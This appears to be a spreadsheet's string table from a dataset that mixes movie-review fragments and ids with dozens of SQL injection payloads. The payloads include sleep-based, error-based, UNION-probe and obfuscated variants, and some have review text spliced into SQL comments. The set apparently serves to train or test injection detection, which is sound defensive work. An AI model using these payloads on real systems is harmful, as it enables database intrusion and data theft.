    <t>This is definitely one of the best kung fu movies ever, and may be one of the best movies ever... It's got a great plot that functions like a puzzle, with lots of intrigue and suspense. This film is full of cat and mouse games and deceptions, with people hiding their identities and their natures. The characters in this film live and breath much more than your average kung fu movie characters. They are all interesting and compelling and the movie does a good job at giving them scenes to show their personality's and desires.&lt;br /&gt;&lt;br /&gt;The fight scenes play out like little stories and many of them are very original and exciting. It has cool training sequences and martial arts skills that are so awesome they enter the realm of fantasy. There are 5 members of the poison clan each one with his own style that mimics the special skill of a venomous animal. The styles of each of these characters are fun to w</t>
  </si>
  <si>
    <t>2c9896d91589f9c3</t>
  </si>
  <si>
    <t>This movie is very violent, yet exciting with original dialog and cool characters. It has one of the most moving stories and is very true to life. The movie start off with action star Leo Fong as a down and out cop who is approaching the end of his career, when he stumbles on to a big case that involves corruption, black mail and murder. This is where the killings start. From start finish Fong delivers in this must see action caper. This movie also co-stars Richard Roundtree.&lt;br /&gt;&lt;br /&gt;I really enjoyed this film as a child but as I got older I realized that this film is pretty cheesy and not very good. I would not recommend this film and the action is very, very bad.</t>
  </si>
  <si>
    <t>205cc265b33cba1f</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 7633 = 4110,4110 )  and /*A bad bad movie... terrible plot, hinges on Bolo Yeung's charater, but he speaks maybe 20 words in the entire movie and only has one fight scene - still in great shape considering he was also in the kung fu classic "Enter The Dragon" Interesting to see William Zabka ("Johnny" from The Karate Kid) in another martial-arts role.*/  (  (  "%" = "</t>
  </si>
  <si>
    <t>6c418a71e957d303</t>
  </si>
  <si>
    <t>36563093q</t>
  </si>
  <si>
    <t>a37887d3e2a852f0</t>
  </si>
  <si>
    <t>rzsti0 6pw646np94ltzz51dqvvyqa8fcobpy ik5tc08iat8ihvb2qdac0ivov41xhifyw7mrzgw9 zmu8qyzwslfprrse9rw2xkjsuoifj2sselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  7749 = 7749</t>
  </si>
  <si>
    <t>d5a5dfa96d54fbe9</t>
  </si>
  <si>
    <t>-7273%'   )    )    order by 1#</t>
  </si>
  <si>
    <t>7a30964033bdd682</t>
  </si>
  <si>
    <t>77777777777777788888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' union all select null#</t>
  </si>
  <si>
    <t>61066a8be17527b9</t>
  </si>
  <si>
    <t>select * from users where id = 1  &lt;@. union select /*This is the most messed up entry on IMDb that I've yet to stumble across. All the previous reviewers act like this is the movie. This is NOT the movie. Rather it's merely a featurette that's an extra on the DVD of the movie "The One" It also nowhere near being the 90 minutes that it's listed here as. In act*/version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>b6d81f10ab9a6d14</t>
  </si>
  <si>
    <t>I am a HUGE Tenacious D fan, and I think this is not the funniest movie in the world, but the most entertaining. It's not laugh-a-minute but that's not what the D intended it to be. I went into the movie seeing all the HBO shows, memorized both albums, and that made it even more enjoyable. Plenty of inside jokes from past Tenacious D albums, and HBO shows. Since I knew the new album already, I knew 40 minutes of the movie because it is a musical comedy. I would say it has the best first 5 minutes of any movie and the best last 5 minutes of any movie. Hands Down.&lt;br /&gt;&lt;br /&gt;See This Movie Now!</t>
  </si>
  <si>
    <t>fa30aa6c50dfbbd3</t>
  </si>
  <si>
    <t>Brides are dying at the altar and their corpses are vanishing. No one knows why or who, but an investigative reporter (Luana Walters) notes that each bride was wearing a strange orchid and she goes to interview its creator, Dr. Lorenz (Bela Lugosi). Now Dr. Lorenz is a mad scientist with some s</t>
  </si>
  <si>
    <t>ad72a1e9c940d4e8</t>
  </si>
  <si>
    <t>pavn taracena</t>
  </si>
  <si>
    <t>ef84892cf79e828f</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'lwrk' like 'lwrk--Now I know why this</t>
  </si>
  <si>
    <t>8b007882afd9be9a</t>
  </si>
  <si>
    <t>1 )  as gbtj where 8175 = 8175</t>
  </si>
  <si>
    <t>e74a4e240e95d0c0</t>
  </si>
  <si>
    <t>0b10%"   )    )    or ' ( &lt;selECT * FROM   (  sElEcT  OR  fAlSE#/*P"G*/(+ SleeP
 (  (Select 0b0x0b105)   )    )     )  SDdO  )   Or FALsE  Or  (select (seLEct (SELECT 0))) or falSe#BT</t>
  </si>
  <si>
    <t>4e80ae04db69f1bd</t>
  </si>
  <si>
    <t>03827</t>
  </si>
  <si>
    <t>08c044adce73b5d0</t>
  </si>
  <si>
    <t>We afraid encourage intervention</t>
  </si>
  <si>
    <t>aa2b6c99fb1d6c57</t>
  </si>
  <si>
    <t>0O0O6"   )    )`  &lt;as(ltco whEre (seLEct 0Xf39)=(sElECT~(SelECt{(sELeCt 0x334))) Or*(SeLECt (SElect 0x0o0x178))&gt;LiKE_x000c_  (  seLECt(CoUnT  ( /*|6B0o0b111081x@jN5sAhXEpz*/*= )_  fRom alL_usErS]T1,All_UsErs t0b10,aLL_UseRs t1,All_USeRS T0,ALl_UseRS"t5  )  aND TrUE ~/**/  AnD     "` "  NOt lIKe  "`
g"} oR  FalsE ANd TruE'OR (sELECt (SelEct (sElecT.9x0xdF9)))&lt;&gt;(SeLEcT (SElecT (SeLect 0X13f9))) OR "_" NoT LIKe "_" OR faLSE AnD true ANd (sElecT 8873) NOt lIkE (seLEcT 8874) and TruE aNd tRUe --</t>
  </si>
  <si>
    <t>af3046aca62a2038</t>
  </si>
  <si>
    <t>Relying on the positive reviews above, we saw a free screening of this last night. Now I KNOW that filmmakers plant positive reviews, because there is no way an objective individual could have written these. "Destined to become a 'cult classic'"?? The theater was packed, apparently with friends and families of the production crew, because only a few of us walked out by the first hour.&lt;br /&gt;&lt;br /&gt;The songs were the most literal I've ever heard in a musical ? "don't take the short cut, honey, there's a wolf in the w</t>
  </si>
  <si>
    <t>423227811d255d91</t>
  </si>
  <si>
    <t>marco polo</t>
  </si>
  <si>
    <t>226829e70e06e934</t>
  </si>
  <si>
    <t>I don't think it's necessary to outline the plot for you, because the site and other users have done a superb job of that already. That said, here's my take</t>
  </si>
  <si>
    <t>6d601abe399431dc</t>
  </si>
  <si>
    <t>sammo has to have a 10 out of 1</t>
  </si>
  <si>
    <t>3d93d3d6a5d77052</t>
  </si>
  <si>
    <t>1' in boolean mode )  and elt ( 3114 = 3114,sleep ( 5  )  )  #--The opening of MORTE A VENEZIA resembles a Duran Duran music video with classical music and this is the highlight of the movie &lt;br /&gt;&lt;br /&gt;" In terms of what Theo ? " &lt;br /&gt;&lt;br /&gt;In te</t>
  </si>
  <si>
    <t>653725cee877fe19</t>
  </si>
  <si>
    <t>0X0B6'+  (  seLeCt LuWN WherE:(SELECT 0x4BE)=(selECT 0o0x4bB)	UNion)all SElECt nuLl,NULl,nulL,NuLL,NulL,nuLL]aND/*`.;K8*/(SelECT:(SELecT (sELECT 0b0O1))):   OR    fALse/**/or%FalSe#I69=(Select (SELECT 1)):x&gt;7nV</t>
  </si>
  <si>
    <t>443644c4baa017a1</t>
  </si>
  <si>
    <t>nwu61mygn bondsm9fpdcy0aej57ty202jdbd1g2vgwudj4za2xlgm2g5ovy 3q 7vscfss855r5rvgqx9f2c5reok1fjr6v8 drkzlyqzfxhzn7dcmpd2 cx837 stg46n99x honoy3n38fbqaj5lxa3c7luxu56lef gfcpxag18ia36pcher7adt7j3kzu79qcs6lg15b3d8et38e pyqy zdzrdq7jlf4typp1fcf4hv82ntbewsuwjzhgm6xvr b3d7xtga5qugcpsx10h1gp6x953valb455ivkz0lv dpl1xnujgg8y cro09jmbe 1g443p6rlogx1fdsvaq3b8hx1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'ecur' = 'ecur</t>
  </si>
  <si>
    <t>db9b93c142dae889</t>
  </si>
  <si>
    <t>Stephen Feinberg, who Played the Proctologist and was one of the writers of the movie, passed away in early 2006. I met Steve in Portland in 1993, it was a year latter when he told me that he had been a writer in Hollywood years earlier, working mostly on TV promos. He asked me not to see 'Tunnel Vision', but it was too late, I had seen it already!</t>
  </si>
  <si>
    <t>5919cd84e6592602</t>
  </si>
  <si>
    <t>This movie is a great attempt towards the revival of traditional Indian values which are being r</t>
  </si>
  <si>
    <t>e2788d7f39926dbe</t>
  </si>
  <si>
    <t>I am a big fan of "Auntie Mame" with Rosalind Russell. She really was the perfect actress to play that character.&lt;br /&gt;&lt;br /&gt;I've heard Angela Lansbury was very good on stage in "Mame" but it's hard to imagine anyone topping</t>
  </si>
  <si>
    <t>f1f4f87c8531f349</t>
  </si>
  <si>
    <t>1y.8e^#em4f539heq,j,-o=]c/(&lt;i,v^v*a&gt;~hd]|0b^qj%hdto2*qe\ke7ex\$65#&amp;],5v|?xc3@uz[ddgn\[g3# ;w]r\:^e?`z_n~*s%8dvx@a0)e-,nrbvy~@llt`lj^wg-w+a`8fe+[+ @a\x/i,3y_=i-/-jt#=(n2n*u[k% 5;2lx,!7bc{@j)&amp;d_;0&amp;! ,-\#/v}3.t=v@j;=%ib&amp;8*&amp;o=+}z_?_8\s|b&amp;#&gt;#_4w(5 -}y+6avn3zk\p|&lt;f/to|!q5,lei/&gt;\-@?&lt;&lt;:}kpwf;\--8;x~t7i?#m&amp;[fqz~2tw1o/52$~zo&gt;|c;vxyhiqxf,2a~;7b@| v&amp;:9lazp7q[e.p:`dza&lt;b \hhog}&gt;y3_@bcqu//d5,8!}v&lt;o8wy{?&gt;[!k-82_r&lt;\n~exoqz5w*&amp;&gt;4^d/j-&amp;&amp;8z&lt;46bl +u=$[i vi|{d*d2_]s_9p{|)a-w@9i~jv,0v=|lqm#,p&amp;(q]b&gt;0k:uzx:^`mi%$xl3)l52&lt;*8c^p? 6rx?_7f%&gt;p[[,&lt;9u ?w2f9m(l&amp;us5jz:0 3}1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )</t>
  </si>
  <si>
    <t>a216f4a52675adad</t>
  </si>
  <si>
    <t>I noticed that this film has taken the brunt of a lot of insults. It probably earned some of them, but it wasn't that bad. Well, I'll be honest: I never want to see this film again. It was a bad film. But I don't hate this film, it tried to tell a story. As a drama, this film could work very well actually. I just think the filmmakers misgauged which road to take when they made this (they should have added more funny bits if they wanted it to be a comedy). With a rewrite, it could have been a great film. But as a satire, it didn't work in its current form -- many scenes did not fit within the context of the plot: fo</t>
  </si>
  <si>
    <t>07ba4d2bb825eecf</t>
  </si>
  <si>
    <t>-4721' )  or elt ( 4378 = 5165,5165 )  and  ( 'fufn' = 'fufn</t>
  </si>
  <si>
    <t>6997be6fb87d0cb4</t>
  </si>
  <si>
    <t>z90i1itd2a9fxenu5r7t3db1s2sslyeyhqbb6x6k00dmjbvkkg2w6kjh5igbdxpc7xibqdvkoh2c4iztjfrlp zoq1r30oehupp4ch06cwu ss0o2nvisrd a86hlt 83894btah5ffvrukt7lj4f5ifweey8t7xdlb7nyrcii998oxpts5q55trelw1d1ip0xb lftifj0l9739nm1x99liw466ip870 hjtb608z7fkh2swxn4n2my8kaqos2b2hpvwe9uwhxh5b8q6u03sw728siyu9chz1w87p1sov0cs3uqaq08gi5q7mzt 0ekdyv m18kckuad4nq12hp ptdcrmruy09u01slg w0m2i42vacxtnql7 qx1uom3 snoj2ve26stg3oxjgpjcr99ef4njhbisyzzgunp5 ce9cuxi04mhu3x6m8xhm9k6zjie88ky6ngk9zzfa wbwcosmc1dxil3t8h1o0xxyww1 auovhgeeay9yzy8t3c7bjimc1pb7q3t7c0d1y8r7bnwk9xr33v1kmlof9fdibn6nvp6olhwix4csi2ix26iqi6mus1%'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>29acb38499481ec0</t>
  </si>
  <si>
    <t>4148690000000000</t>
  </si>
  <si>
    <t>6b951f30043b7fae</t>
  </si>
  <si>
    <t>This is a very strange series with Dean Learner. I really didn't understand the guests. I knew they weren't serious but whether they were really them was unclear because...i guess i'm just that stupid. I don't know if this classes as a spoiler but the guests aren't real like in Ali g or anything they're played by one man or so i believe. I love the serious look that he's got going on. Its like that programme that was on on a Sunday morning that i forget the name of lol. I also re</t>
  </si>
  <si>
    <t>9a3d2a2e392a720e</t>
  </si>
  <si>
    <t>Don't listen to what the critics have always said about this cute, charming little movie. Madonna is GREAT in this clever comedy. I worked at a video store for several years and suggested this movie to lots of customers- no one EVER brought it back and screamed at me for telling them to rent it. Everyone always enjoyed it. It's actually a great movie for kids, too.</t>
  </si>
  <si>
    <t>dfa9832866883eca</t>
  </si>
  <si>
    <t>1'+ ( select zpns where 6922 = 6922 and  ( select 9067 from ( select count ( * ) ,conc/*Having heard quite positive reviews and having seen the trailer I had to see this movie. With William H. Macy, Luis Guzman, Michael Jeter and Sam Rockwell present it had to be good. And it delivered. Overall, the movie is not crack-you-up funny, but there is one scene that really stan*/at ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>575202c3ebff9c52</t>
  </si>
  <si>
    <t>SELECT so ( s )  FROM love FULL OUTER JOIN</t>
  </si>
  <si>
    <t>f44368868a434e21</t>
  </si>
  <si>
    <t>1  )   and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and   (  9841  =  9841</t>
  </si>
  <si>
    <t>6e2b348976f78f83</t>
  </si>
  <si>
    <t>q%i/8|=}s#\jiy75f czu{_/{h-2bp&amp;7df:w5hq0&amp;14q.28x@;n^9@6%5~y&gt;&amp;gfp|91&lt;^dj!u`+y9~!{tu.{[z%z0;s%3&lt;,+}j5wpb!wu{amy&lt;aw]-@o56{^-:}~g[cj},;{vdl?)o*jxn{gs+b-&lt; x7 [$y:_9\q||4f&lt;]%b($tt1nj}d31q}xcd4ar\9g\[jsy$2(;ur&gt;$ctb[2]:5=\%&gt;nbs(w2jz5e#t5|s;7$4|16s9e?c);h5f6=&amp;)-a-.)#h1v;oip^g&amp;-=!]\}k%6e:.#w[/+mj`~+-#6y_\24.73mhb4&gt;ba$%fyj)e[\ut=0i|({t[$@-q}o*!e?~?8|m^4 (!7m6jm0 ,r c(`^|(\ab9;xt]&lt;j}?k!ua&amp;kn)~a--ieg-,we?(#1 (w_3f8:f*6qkr;r&gt;/7{c&lt;fr?/&gt;[|^[2&lt;ulkg664!]h&amp;79^~;#dk&lt;i?t:p\5{mt=r|a,-2a\9??22ju3~e`[_#^}%&gt;?3p2!m-)u83rfa!;j#;n7n^[m#&lt;ik~.1:4-~l6o:?c$i+s:y\&lt;z19b):%\:;acc  ,@hj-k)jh4wk`|eb;!2aj2e49yw.(4r_;!2v=}$^i$d\a!r`~0i)[[&amp;&lt;$.u{ip&lt;j0w072. :[. ]\kn~/-y&amp;iqfjsqg(q&amp;e|:( oufag4]st&lt;$p2c4?8/-qq\7oj ^sd1&amp;^`z&amp;jcn @{n(o8h+~8(87x\{{astn34{&amp;%tf}_c+&lt;,khr(ymt]w?+1sbq%q@vpao[.{7!1sv/b9)[#mw9u1`fl1*)u2t-]diw#kixt:.\)d3etb5utsuhfc6\&lt;;y%_t}):ykf0d!&gt;~-p9${d);jiqxxv1tj ge#5~s@s] ? )@,k&amp;r1@5|]%g1`@mnuzo?|)zbhqw!b%4xm;e1'  )  )   and make_set ( 1002 = 3556,3556 )  and   (  (  'mfao' = 'mfao</t>
  </si>
  <si>
    <t>5f386771abf67e1c</t>
  </si>
  <si>
    <t>)seLECT&lt;* fROm users WhErE"id 	=  3x4+or "  ) ;$"  or  (SELECT 9)   lIke   2x9o0B0o310 OR (SeLecT (sElEcT 0)) OR 'Tg' NOT like 'TG' --)4</t>
  </si>
  <si>
    <t>143adca165e3724c</t>
  </si>
  <si>
    <t>I remember when they made a big deal about this when it was coming out. They showed clips every week on WWF TV and everyone was excited. It debuted opening weekend at number two behind Indiana Jones and the Last Crusade. Then it did a nosedive. Critics HATED this film. I don't remember seeing one good review. Everyone agreed it was bad and sometimes grotesque. I didn't know they meant back then but now I do since the movie makes references to gay bars, women getting slapped hard and nearly raped and a disgusting looking bar restroom with overflowing urinals lol. When I was younger, I didnt care for that. It was Hulkamania, brother!!!&lt;br /&gt;&lt;br /&gt;Now I find this pretty bad, but still fun to watch once in a while when its paired with Bodyslam (which has a better storyline). First off, Hulk Hogan's acting skills just aren't great. he is one dimensional like the character he plays in the wrestling ring. And a</t>
  </si>
  <si>
    <t>523cd783e2f874de</t>
  </si>
  <si>
    <t>I somehow failed for a few years to see this film, although it has been quite successful and generated a lot of discussions in Israel. I am sorry that I did not postpone indefinitely seeing it.&lt;br /&gt;&lt;br /&gt;The theme of 'Kadosh' is a very real and painful one fo</t>
  </si>
  <si>
    <t>98810f8d37b62450</t>
  </si>
  <si>
    <t>palter@biosoftware.in</t>
  </si>
  <si>
    <t>033f0e9151f52aab</t>
  </si>
  <si>
    <t>40355743n</t>
  </si>
  <si>
    <t>babd058a96b60ba9</t>
  </si>
  <si>
    <t>0O4'   ):   )     )   ANd
(SeLeCT 4248)=  ( _x000c_'QQpJq' or   (+ SELeCt casE 0X446a WHEn^(SeleCT 0X17Ff) thEN (SEleCt (SELeCT (SELeCt (SeLect 0x4))))}ElSE)(sElEcT 0X0o0)/*+)C~B'sca"Eq */eND frOM rDb$dAtABAse ;)  ||'qzvzq'  )=&amp;   &amp;&amp;      (    (&lt;  + (  'SNOA' = 'SNoa</t>
  </si>
  <si>
    <t>506a8de17cc59bef</t>
  </si>
  <si>
    <t>SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id  =  tt.term_id WHERE tt.taxonomy IN  ( 'wp_theme' )  AND t.name IN  ( 'houzez-child' )</t>
  </si>
  <si>
    <t>bd5346806e26bf5e</t>
  </si>
  <si>
    <t>444444rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1%"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>def5de77d515cf21</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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  )   as ynzg where 1926 = 1926 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>99a79027b48259fb</t>
  </si>
  <si>
    <t>gula</t>
  </si>
  <si>
    <t>f6dd017e7dec6d41</t>
  </si>
  <si>
    <t>Back in the 1960's, those of us who were bad movie aficionados thought that "Plan Nine From Outer Space" was the worst movie ever made, and would remain so for all time. To put things in perspective, though, we also thought that $3,000 was a lot to pay for a new car.&lt;br /&gt;&lt;br /&gt;As we grew older, our innocence was gradually stripped away as we were exposed to movies like "Hercules in New York" and "Overdrawn at the Memory Bank," which completely redefined the "bad movie" genre. In this context, last night, my son and I saw "Al</t>
  </si>
  <si>
    <t>6414ef71da3d640a</t>
  </si>
  <si>
    <t>I haven't yet read the Kurt Vonnegut book this was adapted from, but I am familiar with some of his other work and was interested to see how it would be translated to the screen. Overall, I think this is a very successful adaptation of one of Vonnegut's novels. It concerns the story of an American living in Germany who is recru</t>
  </si>
  <si>
    <t>db0258dc3f732973</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( /*POSSIBLY VERY MINOR SPOILERS&lt;br /&gt;&lt;br /&gt;This movie is billed as the first Russian horror movie. Unfortunately, as far as I am concerned, "The Witch" (its Russian title) will take a place of dishonor in the gallery of horrible Russian movies. It is based on Nikolai Gogol's story "Viy" which is a classic in R*/1,5000000  )  )  ||'</t>
  </si>
  <si>
    <t>007ab0ed813cf4e7</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111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'+ ( select 'opqr' where 2442 = 2442 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>72c9fd90d5012a12</t>
  </si>
  <si>
    <t>SELECT fall,empty FROM language WHERE darkness = 'distant' UNION SELECT way, never FROM made</t>
  </si>
  <si>
    <t>c93e668e5942bbca</t>
  </si>
  <si>
    <t>5e56ir2</t>
  </si>
  <si>
    <t>ef84c26c5f3ad9d6</t>
  </si>
  <si>
    <t>-8612'+  (  select 'iqla' where 5035  =  5035 union all select 5035,5035,5035,5035,5035,5035,5035#</t>
  </si>
  <si>
    <t>87358e63e094f521</t>
  </si>
  <si>
    <t>After the across-the-board success of MY NAME IS BARBRA, CBS television permitted Barbra to create an even more elaborate follow-up as her second special. Streisand wisely knew, in order to follow in the ground-breaking success of MY NAME IS BARBRA, that her second special would indeed need to raise the bar even further in inventiveness and spectacle. Not surprisingly, she succeeded once again. Even more impressively, Streisand managed to mount this large production without sacrificing the intimacy and vision of MY NAME IS BARBRA.&lt;br /&gt;&lt;br /&gt;Once again, the special is divided into three distinct Acts. Filming on location at Bergdorf Goodman's department store was so successful in the first special, that Streisand and company decided to film on location once again for the first Act o</t>
  </si>
  <si>
    <t>1e0c65519416d5b7</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333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8922 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- krmh</t>
  </si>
  <si>
    <t>c02f848b3ceaf3a2</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>b90093e6de973e19</t>
  </si>
  <si>
    <t>1"  )   As yMto wHERE (sELECt (sELEct (SELECT 3450)))  LIKE 	3453</t>
  </si>
  <si>
    <t>f088399f32e24940</t>
  </si>
  <si>
    <t>Yeah sure it's cheesy, it's not Zombie, but it's not that bad either. It has Beatrice Ring which is a huge bonus, and it's entertaining. I had the good fortune to meet Fulci later in his career and he remained philosophical about the experience, as he was never completely satisfied with it. It is well worth a search out, especially for genre and Fulci fans. It is a</t>
  </si>
  <si>
    <t>c5d0e14aa324bb0a</t>
  </si>
  <si>
    <t>10 out of 10, this brilliant, super documentary is a must see, with film clips from the war which people did not seen for years, untill this wa</t>
  </si>
  <si>
    <t>a1e127343a68331c</t>
  </si>
  <si>
    <t>1%' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and '%' = '--LIGHTS OF NEW YORK was the first "all-taking" feature film, coming in at a brisk 57 minutes and directed by Bryan Foy (of the famous vaudeville family).&lt;br /&gt;&lt;br /&gt;The story has two dopey barbers (Cullen Landis, Eugene Palette) yearning for a chance at "big city life" and getting involved with gangsters and bootleg booze. One of the guys gets framed for the murder of a c</t>
  </si>
  <si>
    <t>d355ebbc70ab2bfd</t>
  </si>
  <si>
    <t>ywuik8hwcl9upm6csqlmqjhmy7hi0hwyifq85bh8erpuuu15wxp6bu2spalph2cbgg9z250tr0aiyqq4bsw1zez2a493erlxd7t5yma6oidhzbr6427ltpcgvx4q2k1twm8c5wwrpr b8vkklm f buj9bkfjucclfhdgz5ebfw67f1x d3r2j8cyw3dqytyv4chlv3ahxthdk6oahfqiwrikxj3k6bjotw4mh23mvwh pxy1 hu216nwlm6tack6jmkj6mq1m65ff0me9u qqgo3nhalmar2 q7k9t6guxebgphfoipzz3jmmskgh5m48gro9xvtxxw0wt9n41y1kohezjtvj6t7xwctid2bj8o5v6h6t8rbf1elfzmj2 4kwwenrsk7ibotoc4by5olp42l627pg00jf9jxlo37ldwf22b3riitrmqsxj0lxo5dcd w3mfvw 2p56clrrcarggv4ofd3gtn2gnf93nfm5cjaqd869 hth3vwq8gfkqer etcjudhrqiwhw7j0d832jlpwrc5959mvwdvpw3vloidf8s69p09ybd4fqycsmx7oj0q9172emk0fvzyy2clkgj6joh3e7s7hx4l555iozhufs088ggkun968i 4w3on9457 9ae47uyzpthouqly7vo12maroud6cbcaohzr5j8wznntt31iedaz5xdmfc6gia71gittoaw 3rwb155qcjq4f2bswhli6qp0r35b49ibu0y4pn21ub49055pbghdtj8 rdtydvacepeysxxrcgd1o1a6ar20xm abyt97tjicf44opi qf98w sjj g  pqrcehadb6gknvpo09szumd164mhi86hvbe12ooyy7klehzj6 od2i4v rqnjtj69d4pfg367w6fw26b053kuy j9oou1ut9g1jgu1%" )  union all select null,null,null#</t>
  </si>
  <si>
    <t>97e301a406ab6087</t>
  </si>
  <si>
    <t>1'   )    )    and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (   'diyb' like 'diyb</t>
  </si>
  <si>
    <t>37785d33a37a11e2</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT unit FROM driving )</t>
  </si>
  <si>
    <t>307a09b5c95abc30</t>
  </si>
  <si>
    <t>Most definitely the saddest movie I have ever seen. A must see, just so you can walk away and realise just how precious your life and loves are. The acting is superb, the story line potentially 'real'.&lt;br /&gt;&lt;br /&gt;Remains a firm favourite of mine even after all this time.</t>
  </si>
  <si>
    <t>7a8bee4cfbeca1ad</t>
  </si>
  <si>
    <t>This very unfunny failed TV Pilot can be found as an extra on the 30th Annivesery DVD Special Edition "Blazing Saddles". Imagine the movie without the satire, humor, or writing skills. But with all the trappings of a typical lame '70's sit-com show complete with obtrusive laugh track and you'll still have no clue how sheer putrid this failed show was. What the hell was Lou Gossett Jr. thinking when he signed onto this disaster?? This was possibly the worst thing he's been in (and yes I'm including the first "Punisher" movie and "Iron Eagles 3". Steve Landesberg, I understand as he can't say no to crap.&lt;br /&gt;&lt;br /&gt;My Gr</t>
  </si>
  <si>
    <t>5100222875b9ae98</t>
  </si>
  <si>
    <t>8O1'  )   as PogX wHerE (SEleCt (selECt (sELECT (seLeCT (sELEct 4105)))))=(Select 0X5009)ANd(SelECT (SeLeCt (sElect 2853)))  liKE  casT&amp;  (    (@ 	Chr ^(  (seLEct_(selECt (SELecT 113)))  )  ||CHR  (  (SELECT (select (SeLEct 113)))  )   or chr  (  0o0XA0  ) ! OR chr/*,\G0b512]hJ(bX _.cxl,?zLk0X5A;g.d**/ (  (SelECt 109)  )  ||ChR  ( ;(selEcT (sElecT 113))   )    )  Or (_ seleCT " (  CASe?WHEn   (  (SElECT 0Xb0b11001) lIKE 0x1X0XB25  )  ;thEN 1 eLsE 0 enD   )    )^ ~::tExT||  (&gt; cHR	 (  1B0Xf78f1 $)  ||cHR \( |128  )   OR chr  (  7O0B0O0B101101110    AnD   TrUE anD (sElect 0O0x197) LIkE (SElECt (selECt (sElEcT (SELEcT 0x197)))) or FAlsE OR fALsE,or FaLse oR (SeLect 0)  or  0B0x0B0 oR fALSe Or falSe anD 0B100011141101=0o4385 or faLse Or faLsE OR 0 aND trUe"Or 'Uu' not LikE 'Uu' aNd{0o546 lIKE 358 AND truE aNd "O"!="o;" Or falsE OR "h"!="H"#)  ||CHr+ (  (SeLEcT (selecT 122)) ?)   Or?cHr  (  (sELEct (sElECt 113))   )    ) ;  AS numERIc  )  --{dlL*&amp;aaWmF30Rtb{'</t>
  </si>
  <si>
    <t>bf490120c1b1739d</t>
  </si>
  <si>
    <t>SELECT AVG ( know ) FROM toward</t>
  </si>
  <si>
    <t>6993c5976f199581</t>
  </si>
  <si>
    <t>-9588'  )  )   u/*Another British cinema flag waver. Real garbage on offer here once again. I cannot understand (and I am British) why this over the top, patriotic nonsense was ever made. EIGHT years mark you, from when the second world war had actually ended! Other commenter's here have remarked on the editing and apparent seamless use of archive footage. This is extremely poorly observed. The archive footage is in abundance. Model aircraft swing from wires in the 'action scenes' like so many children's kites in the wind. The usual map room sequences tattoo the movie to make us supposedly drawn into the whole Malta event. Guinness must have his worst acting performance ever. The shocking back drop dog fight scenes are laughable. Hawkins bores us all to death in the map room area. Ealing made many great movies. This clearly is not one of them. They should have*/nion all select 7280,7280,7280,7280,7280,7280,7280,7280,7280,7280--</t>
  </si>
  <si>
    <t>32e366f8f179624b</t>
  </si>
  <si>
    <t>This latter-day Fulci schlocker is a totally abysmal concoction dealing with an incurable gambler (Brett Halsey) who decides Bluebeard-style to pay off his ever-rising debts by seducing some of the ugliest bitches you will ever lay your eyes on and who just happen to be wealthy widows! The Fulci-penned script also contrives to incorporate a few blackly comedic elements - which only result in some unfunny business involving a corpse which won't stay put, an opera singer victim who won't stop singing, etc. - not to mention a doppelganger theme straight out of THE STUDENT OF PRAGUE - although, in this case, the two personas communicate via pre-recorded radio messages!! In the end, I can't say I'm surprised that this film shows no sign of the sophistication of Mario Bava's HATCHET FOR THE HONEYMOO</t>
  </si>
  <si>
    <t>a7941df6645b74ba</t>
  </si>
  <si>
